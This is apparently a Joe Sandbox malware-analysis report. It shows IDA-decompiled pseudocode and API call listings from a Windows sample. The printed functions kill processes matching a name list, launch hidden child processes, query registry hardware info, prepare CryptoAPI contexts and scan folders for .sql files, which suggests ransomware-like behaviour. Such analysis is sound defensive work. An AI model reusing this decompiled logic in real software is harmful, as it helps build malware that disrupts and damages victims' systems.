                                        					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0); // executed
                                        					_v16 = _t18;
                                        					if(_t18 != 0) {
                                        						_t19 = MapViewOfFile(_t18, _t37, 0, 0, 0); // executed
                                        						_t38 = _t19;
                                        						if(_t38 != 0) {
                                        							_t23 = E0FC63030(0, _t34, _t38); // executed
                                        							if(_t23 == 0) {
                                        								_push(_t29);
                                        								_t4 = _t38 + 0x53; // 0x53
                                        								_t29 = _t4;
                                        								_t5 = _t23 + 6; // 0x6, executed
                                        								E0FC682A0(_t29, _t5); // executed
                                        								_t40 = _t40 + 4;
                                        							}
                                        							_push(_t29);
                                        							_t24 = E0FC62830(_v12, _t38, _v8); // executed
                                        							_t28 = _t24;
                                        							UnmapViewOfFile(_t38);
                                        						}
                                        						CloseHandle(_v16);
                                        						CloseHandle(_t34);
                                        						return _t28;
                                        					} else {
                                        						CloseHandle(_t34);
                                        						goto L3;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,0FC62C02), ref: 0FC628AB
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,0FC62C02), ref: 0FC628BA
                                        • CreateFileMappingW.KERNELBASE(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0FC62C02), ref: 0FC628E5
                                        • CloseHandle.KERNEL32(00000000,?,?,0FC62C02), ref: 0FC628F3
                                        • MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,0FC62C02), ref: 0FC6290A
                                        • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0FC62C02), ref: 0FC62942
                                        • CloseHandle.KERNEL32(?,?,?,0FC62C02), ref: 0FC62951
                                        • CloseHandle.KERNEL32(00000000,?,?,0FC62C02), ref: 0FC62954
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                        • String ID:
                                        • API String ID: 265113797-0
                                        • Opcode ID: e20f1cb594ab6612d0acf702c60ff47460383c74387f1e27b6848d46f3f9fcca
                                        • Instruction ID: 4b4095c0a806bea7b940f39d1836209fe2ecdec50056eb24457ebbf8d8ad505b
                                        • Opcode Fuzzy Hash: e20f1cb594ab6612d0acf702c60ff47460383c74387f1e27b6848d46f3f9fcca
                                        • Instruction Fuzzy Hash: 20212971A1921ABFE7106B759CC7FBE776CDB45675F000224FE01F2281DA38AD1556B0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E0FC64C40(WCHAR* __ecx) {
                                        				struct _PROCESS_INFORMATION _v20;
                                        				struct _STARTUPINFOW _v92;
                                        				intOrPtr _t15;
                                        				intOrPtr _t16;
                                        				int _t20;
                                        				WCHAR* _t25;
                                        
                                        				asm("xorps xmm0, xmm0");
                                        				_t25 = __ecx;
                                        				asm("movdqu [ebp-0x10], xmm0");
                                        				E0FC69010( &_v92, 0, 0x44);
                                        				_t15 =  *0xfc72a6c; // 0x738
                                        				_v92.hStdError = _t15;
                                        				_v92.hStdOutput = _t15;
                                        				_t16 =  *0xfc72a68; // 0x748
                                        				_v92.dwFlags = _v92.dwFlags | 0x00000101;
                                        				_v92.hStdInput = _t16;
                                        				_v92.wShowWindow = 0;
                                        				_v92.cb = 0x44;
                                        				_t20 = CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20); // executed
                                        				if(_t20 != 0) {
                                        					CloseHandle(_v20);
                                        					return CloseHandle(_v20.hThread);
                                        				} else {
                                        					return GetLastError();
                                        				}
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 0FC64C59
                                        • CreateProcessW.KERNEL32 ref: 0FC64C9F
                                        • GetLastError.KERNEL32(?,?,00000000), ref: 0FC64CA9
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FC64CBD
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0FC64CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateErrorLastProcess_memset
                                        • String ID: D
                                        • API String ID: 1393943095-2746444292
                                        • Opcode ID: 64d86eed99413b1c13c576b7b5f24e43ec57ca83f3c95fe27599b998bb79f45d
                                        • Instruction ID: dca1390d63f15c522b6c569ec1a09a9591e025423066f5facec3f4b71037e259
                                        • Opcode Fuzzy Hash: 64d86eed99413b1c13c576b7b5f24e43ec57ca83f3c95fe27599b998bb79f45d
                                        • Instruction Fuzzy Hash: 7C018471E44319ABDB20DFA5DC46BDE7BB8EF08721F100116F608F6180E7B525548B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0FC648A8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
                                        				int _t8;
                                        				int _t9;
                                        				int _t10;
                                        				void* _t15;
                                        				WCHAR* _t17;
                                        				void* _t18;
                                        				signed int _t23;
                                        				void* _t24;
                                        				void* _t28;
                                        
                                        				_t17 = __ecx;
                                        				_t15 = __ebx;
                                        				while(1) {
                                        					L2:
                                        					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                        					if(_t8 == 0) {
                                        						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                        						if(_t18 != 0) {
                                        							TerminateProcess(_t18, 0);
                                        							CloseHandle(_t18);
                                        						}
                                        					}
                                        					_t23 = _t23 + 1;
                                        					_t5 = _t15 + 0x24; // 0x24
                                        					_t17 = _t5;
                                        					if(_t23 < 0x27) {
                                        						continue;
                                        					}
                                        					L7:
                                        					_t24 = _a12;
                                        					_t9 = Process32NextW(_t24, _t15);
                                        					_t7 = _t15 + 0x24; // 0x24
                                        					_t17 = _t7;
                                        					if(_t9 != 0) {
                                        						_t23 = 0;
                                        						do {
                                        							goto L2;
                                        						} while (_t23 < 0x27);
                                        						goto L7;
                                        					}
                                        					if(_t15 != 0) {
                                        						VirtualFree(_t15, 0, 0x8000); // executed
                                        					}
                                        					_t10 = FindCloseChangeNotification(_t24); // executed
                                        					return _t10;
                                        					L2:
                                        					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                        					if(_t8 == 0) {
                                        						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                        						if(_t18 != 0) {
                                        							TerminateProcess(_t18, 0);
                                        							CloseHandle(_t18);
                                        						}
                                        					}
                                        					_t23 = _t23 + 1;
                                        					_t5 = _t15 + 0x24; // 0x24
                                        					_t17 = _t5;
                                        				}
                                        			}

                                        APIs
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FC648B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FC648C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0FC648D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0FC648E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0FC648FA
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC64913
                                        • FindCloseChangeNotification.KERNEL32(?), ref: 0FC6491A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
                                        • String ID:
                                        • API String ID: 3573210778-0
                                        • Opcode ID: e40dfb4f46076abf7cdd25228d6964b456959c77013495e2e910e85bd2e81a8a
                                        • Instruction ID: 42b424f9f6cbefc49eaab01ab97803ffbbebe5487e7f7b980f761b3f739ab1b4
                                        • Opcode Fuzzy Hash: e40dfb4f46076abf7cdd25228d6964b456959c77013495e2e910e85bd2e81a8a
                                        • Instruction Fuzzy Hash: C501DB36108202EFD7159F52EC86F5A7368EF85712F100024FA0AE6041DF74A9198B61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0FC672B0(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
                                        				void* _v8;
                                        				long _t14;
                                        				long _t18;
                                        
                                        				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
                                        				if(_t14 != 0) {
                                        					return 0;
                                        				} else {
                                        					_a8 = _a20;
                                        					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
                                        					if(_t18 != 0) {
                                        						GetLastError();
                                        						RegCloseKey(_v8);
                                        						return 0;
                                        					} else {
                                        						_t11 = _t18 + 1; // 0x1, executed
                                        						RegCloseKey(_v8); // executed
                                        						return _t11;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0FC67725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC672C6
                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0FC67725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC672E7
                                        • RegCloseKey.KERNEL32(?,?,0FC67725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC672F7
                                        • GetLastError.KERNEL32(?,0FC67725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC67306
                                        • RegCloseKey.ADVAPI32(?,?,0FC67725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC6730F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$ErrorLastOpenQueryValue
                                        • String ID:
                                        • API String ID: 2437438455-0
                                        • Opcode ID: 450c02c57fe726ef800dc1276e54c68650b15d51085a526e550795c06b1d4c9e
                                        • Instruction ID: 738b1dd8bc4fb3b6d582d41d404c3dcee9ce50ac06f2428d3ce285b3d527adfe
                                        • Opcode Fuzzy Hash: 450c02c57fe726ef800dc1276e54c68650b15d51085a526e550795c06b1d4c9e
                                        • Instruction Fuzzy Hash: 6F01213260411EFBCB119F95ED0ADDA7B68EF04362B004162FE06E6111D7329A34ABE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E0FC62830(WCHAR* __ecx, void* __edx, long _a4) {
                                        				long _v8;
                                        				void* _t3;
                                        				int _t7;
                                        				void* _t9;
                                        				void* _t14;
                                        				struct _OVERLAPPED* _t17;
                                        
                                        				_push(__ecx);
                                        				_t9 = __edx; // executed
                                        				_t3 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0); // executed
                                        				_t14 = _t3;
                                        				_t17 = 0;
                                        				if(_t14 != 0xffffffff) {
                                        					if(_t9 == 0) {
                                        						L3:
                                        						_t17 = 1;
                                        					} else {
                                        						_t7 = WriteFile(_t14, _t9, _a4,  &_v8, 0); // executed
                                        						if(_t7 != 0) {
                                        							goto L3;
                                        						}
                                        					}
                                        					FindCloseChangeNotification(_t14); // executed
                                        				}
                                        				return _t17;
                                        			}

                                        0x0fc62833
                                        0x0fc6284a
                                        0x0fc6284c
                                        0x0fc62852
                                        0x0fc62854
                                        0x0fc62859
                                        0x0fc6285d
                                        0x0fc62873
                                        0x0fc62873
                                        0x0fc6285f
                                        0x0fc62869
                                        0x0fc62871
                                        0x00000000
                                        0x00000000
                                        0x0fc62871
                                        0x0fc62879
                                        0x0fc62879
                                        0x0fc62887

                                        APIs
                                        • CreateFileW.KERNEL32(0FC62C02,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000000,0FC62C02,?,0FC6293C,?), ref: 0FC6284C
                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,0FC6293C,?,?,?,?,0FC62C02), ref: 0FC62869
                                        • FindCloseChangeNotification.KERNEL32(00000000,?,0FC6293C,?,?,?,?,0FC62C02), ref: 0FC62879
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$ChangeCloseCreateFindNotificationWrite
                                        • String ID:
                                        • API String ID: 3805958096-0
                                        • Opcode ID: d6b9075aa18aca64a68caf2099bcabaa7206e5a49b92f1d5ed01da755f188266
                                        • Instruction ID: 1d954437abb78c82dac965238082c647446484dbb11cbbc141316bd1bda5aabb
                                        • Opcode Fuzzy Hash: d6b9075aa18aca64a68caf2099bcabaa7206e5a49b92f1d5ed01da755f188266
                                        • Instruction Fuzzy Hash: 8AF0827330421477E6200A96AC8BFEBB65CD78ABA1F504225FF48A61C1D6A4AD1553A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0FC64DE0(void* __ebx, CHAR* __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                        				intOrPtr* _v8;
                                        				CHAR* _v12;
                                        				long _v16;
                                        				void _v4112;
                                        				char* _t18;
                                        				char* _t21;
                                        				intOrPtr _t24;
                                        				char _t26;
                                        				void* _t31;
                                        				void* _t33;
                                        				void* _t38;
                                        
                                        				E0FC68990(0x100c);
                                        				_v8 = __edx;
                                        				_v12 = __ecx;
                                        				while(1) {
                                        					L1:
                                        					_t18 = ReadFile( *0xfc72a70,  &_v4112, 0x1000,  &_v16, 0); // executed
                                        					_t24 = _v4112;
                                        					_t33 =  &_v4112;
                                        					_t21 = _t18;
                                        					if(_t24 == 0) {
                                        						break;
                                        					}
                                        					_t38 = _t33 - "Can\'t find server";
                                        					do {
                                        						_t18 = "Can\'t find server";
                                        						if(_t24 == 0) {
                                        							goto L9;
                                        						} else {
                                        							while(1) {
                                        								_t26 =  *_t18;
                                        								if(_t26 == 0) {
                                        									goto L1;
                                        								}
                                        								_t31 =  *((char*)(_t38 + _t18)) - _t26;
                                        								if(_t31 != 0) {
                                        									L8:
                                        									if( *_t18 == 0) {
                                        										goto L1;
                                        									} else {
                                        										goto L9;
                                        									}
                                        								} else {
                                        									_t18 =  &(_t18[1]);
                                        									if( *((intOrPtr*)(_t38 + _t18)) != _t31) {
                                        										continue;
                                        									} else {
                                        										goto L8;
                                        									}
                                        								}
                                        								goto L10;
                                        							}
                                        							goto L1;
                                        						}
                                        						goto L10;
                                        						L9:
                                        						_t24 =  *((intOrPtr*)(_t33 + 1));
                                        						_t33 = _t33 + 1;
                                        						_t38 = _t38 + 1;
                                        					} while (_t24 != 0);
                                        					break;
                                        				}
                                        				L10:
                                        				if(_t21 != 0 && _v16 != 0) {
                                        					return E0FC64CD0( &_v4112, _v12, _v8);
                                        				}
                                        				return _t18;
                                        			}

                                        0x0fc64de8
                                        0x0fc64def
                                        0x0fc64df2
                                        0x0fc64df6
                                        0x0fc64df6
                                        0x0fc64e0e
                                        0x0fc64e14
                                        0x0fc64e1a
                                        0x0fc64e20
                                        0x0fc64e24
                                        0x00000000
                                        0x00000000
                                        0x0fc64e28
                                        0x0fc64e30
                                        0x0fc64e30
                                        0x0fc64e37
                                        0x00000000
                                        0x0fc64e40
                                        0x0fc64e40
                                        0x0fc64e40
                                        0x0fc64e44
                                        0x00000000
                                        0x00000000
                                        0x0fc64e4d
                                        0x0fc64e4f
                                        0x0fc64e57
                                        0x0fc64e5a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64e51
                                        0x0fc64e51
                                        0x0fc64e55
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64e55
                                        0x00000000
                                        0x0fc64e4f
                                        0x00000000
                                        0x0fc64e40
                                        0x00000000
                                        0x0fc64e5c
                                        0x0fc64e5c
                                        0x0fc64e5f
                                        0x0fc64e60
                                        0x0fc64e61
                                        0x00000000
                                        0x0fc64e30
                                        0x0fc64e65
                                        0x0fc64e6a
                                        0x00000000
                                        0x0fc64e83
                                        0x0fc64e89

                                        APIs
                                        • ReadFile.KERNEL32(?,00001000,00000000,00000000,00000000,00000000,00000000,?,0FC65034), ref: 0FC64E0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: Can't find server
                                        • API String ID: 2738559852-1141070784
                                        • Opcode ID: 595f77427077f2574487bc2e06fcbe631f147002d58d0598b3deff59f72b7b99
                                        • Instruction ID: 2a86b3aecf0d197c3ece1c43e5e53e7ee1d7201483e119b63935c40f0ad95636
                                        • Opcode Fuzzy Hash: 595f77427077f2574487bc2e06fcbe631f147002d58d0598b3deff59f72b7b99
                                        • Instruction Fuzzy Hash: DC115734C0C3999BEF3ACA5498827EAFBB8DF46306F5481D5E98457202E2702A48C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			_entry_(intOrPtr _a8) {
                                        				void* _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				void* _t10;
                                        
                                        				_v16 = 1;
                                        				_v12 = _a8;
                                        				_t10 = CreateThread(0, 0, E0FC64950, 0, 0, 0); // executed
                                        				_v8 = _t10;
                                        				if(_v8 != 0) {
                                        					FindCloseChangeNotification(_v8); // executed
                                        				}
                                        				return _v16;
                                        			}

                                        0x0fc64bf6
                                        0x0fc64c00
                                        0x0fc64c1c
                                        0x0fc64c22
                                        0x0fc64c29
                                        0x0fc64c2f
                                        0x0fc64c2f
                                        0x0fc64c3b

                                        APIs
                                        • CreateThread.KERNEL32 ref: 0FC64C1C
                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 0FC64C2F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ChangeCloseCreateFindNotificationThread
                                        • String ID:
                                        • API String ID: 4060959955-0
                                        • Opcode ID: dd1c34557227a3e2831751e60c876fecc9c552793ed57b32feebebfa4348e95b
                                        • Instruction ID: b4acaa697bbbeade9d818412415d0a0127b6b487d9ef365b9b0b0a8ee5e9b581
                                        • Opcode Fuzzy Hash: dd1c34557227a3e2831751e60c876fecc9c552793ed57b32feebebfa4348e95b
                                        • Instruction Fuzzy Hash: B3F03934A48308FBD714DFA1D84AB8CB774EB04706F20809AEA017B2C0C6B56650DB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E0FC66420(void** __ecx) {
                                        				void** _v8;
                                        				void* _t19;
                                        				void* _t20;
                                        				void* _t24;
                                        
                                        				_push(__ecx);
                                        				_v8 = __ecx;
                                        				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
                                        				_v8[1] = _t19;
                                        				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
                                        				 *_v8 = _t20;
                                        				_v8[3] = 0x123;
                                        				_v8[2] = 0x515;
                                        				_t13 =  &(_v8[1]); // 0xc7000000
                                        				_t24 = E0FC662B0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
                                        				if(_t24 == 0) {
                                        					_v8[4] = 1;
                                        				}
                                        				_v8[4] = 0;
                                        				return _v8;
                                        			}

                                        0x0fc66423
                                        0x0fc66424
                                        0x0fc66435
                                        0x0fc6643e
                                        0x0fc6644f
                                        0x0fc66458
                                        0x0fc6645d
                                        0x0fc66467
                                        0x0fc66485
                                        0x0fc66489
                                        0x0fc66493
                                        0x0fc66498
                                        0x0fc66498
                                        0x0fc664a2
                                        0x0fc664af

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0FC649CE), ref: 0FC66435
                                        • VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0FC649CE), ref: 0FC6644F
                                          • Part of subcall function 0FC662B0: CryptAcquireContextW.ADVAPI32(0FC649CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0FC649C6,?,0FC649CE), ref: 0FC662C5
                                          • Part of subcall function 0FC662B0: GetLastError.KERNEL32(?,0FC649CE), ref: 0FC662CF
                                          • Part of subcall function 0FC662B0: CryptAcquireContextW.ADVAPI32(0FC649CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FC649CE), ref: 0FC662EB
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AcquireAllocContextCryptVirtual$ErrorLast
                                        • String ID:
                                        • API String ID: 3824161113-0
                                        • Opcode ID: 1d416f63c6849ff95af3cd453477913b41bfb01b7c4597601f98bea678b641bb
                                        • Instruction ID: 95436e4d3c6d86c84ba86a1453da4c084fe842431e36840d748da6dc578e252a
                                        • Opcode Fuzzy Hash: 1d416f63c6849ff95af3cd453477913b41bfb01b7c4597601f98bea678b641bb
                                        • Instruction Fuzzy Hash: CD11DB74A44208EFD704CF94DA55F99B7F5EF88709F208188EA05AB381D7B5AF109B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0FC66A40(WCHAR* __ecx) {
                                        				void* _v8;
                                        				void* _v12;
                                        				WCHAR* _v16;
                                        				WCHAR* _v20;
                                        				long _v24;
                                        				struct _WIN32_FIND_DATAW _v620;
                                        				int _t38;
                                        				struct _SECURITY_ATTRIBUTES* _t40;
                                        				int _t50;
                                        				WCHAR* _t52;
                                        				intOrPtr _t53;
                                        				void* _t54;
                                        				WCHAR* _t57;
                                        				long _t64;
                                        				WCHAR* _t66;
                                        				void* _t67;
                                        
                                        				_t66 = __ecx;
                                        				_v16 = __ecx;
                                        				_t52 =  &(_t66[lstrlenW(__ecx)]);
                                        				_v20 = _t52;
                                        				lstrcatW(_t66, "*");
                                        				_v8 = FindFirstFileW(_t66,  &_v620);
                                        				 *_t52 = 0;
                                        				_t53 = 0;
                                        				do {
                                        					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
                                        						goto L20;
                                        					} else {
                                        						lstrcatW(_t66,  &(_v620.cFileName));
                                        						_t38 = lstrlenW(_t66);
                                        						_t10 = _t38 - 1; // -1
                                        						_t57 =  &(_t66[_t10]);
                                        						if(_t38 == 0) {
                                        							L18:
                                        							_t53 = 0;
                                        							goto L19;
                                        						} else {
                                        							while( *_t57 != 0x2e) {
                                        								_t57 = _t57 - 2;
                                        								_t38 = _t38 - 1;
                                        								if(_t38 != 0) {
                                        									continue;
                                        								}
                                        								break;
                                        							}
                                        							if(_t38 == 0) {
                                        								goto L18;
                                        							} else {
                                        								_t40 = lstrcmpW(_t57, L".sql");
                                        								if(_t40 != 0) {
                                        									goto L18;
                                        								} else {
                                        									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
                                        									_t64 = GetFileSize(_t54, 0);
                                        									_v12 = 0;
                                        									if(_t64 < 0x40000000) {
                                        										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
                                        										if(_t67 != 0) {
                                        											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0FC68100(_t67, "*******************") != 0) {
                                        												_t50 = lstrlenA("*******************");
                                        												_t15 = _t67 + 1; // 0x1
                                        												_v12 = E0FC669E0(_t15 + _t50);
                                        											}
                                        											VirtualFree(_t67, 0, 0x8000);
                                        										}
                                        										_t66 = _v16;
                                        									}
                                        									CloseHandle(_t54);
                                        									_t53 = _v12;
                                        									if(_t53 == 0) {
                                        										L19:
                                        										 *_v20 = 0;
                                        										goto L20;
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        					break;
                                        					L20:
                                        				} while (FindNextFileW(_v8,  &_v620) != 0);
                                        				FindClose(_v8);
                                        				return _t53;
                                        			}

                                        0x0fc66a4b
                                        0x0fc66a4f
                                        0x0fc66a5e
                                        0x0fc66a61
                                        0x0fc66a64
                                        0x0fc66a7e
                                        0x0fc66a83
                                        0x0fc66a86
                                        0x0fc66a90
                                        0x0fc66aa0
                                        0x00000000
                                        0x0fc66abc
                                        0x0fc66ac4
                                        0x0fc66acb
                                        0x0fc66ad1
                                        0x0fc66ad4
                                        0x0fc66ad9
                                        0x0fc66ba8
                                        0x0fc66ba8
                                        0x00000000
                                        0x0fc66ae0
                                        0x0fc66ae0
                                        0x0fc66ae6
                                        0x0fc66ae9
                                        0x0fc66aea
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc66aea
                                        0x0fc66aee
                                        0x00000000
                                        0x0fc66af4
                                        0x0fc66afa
                                        0x0fc66afe
                                        0x00000000
                                        0x0fc66b04
                                        0x0fc66b17
                                        0x0fc66b22
                                        0x0fc66b26
                                        0x0fc66b2f
                                        0x0fc66b40
                                        0x0fc66b44
                                        0x0fc66b57
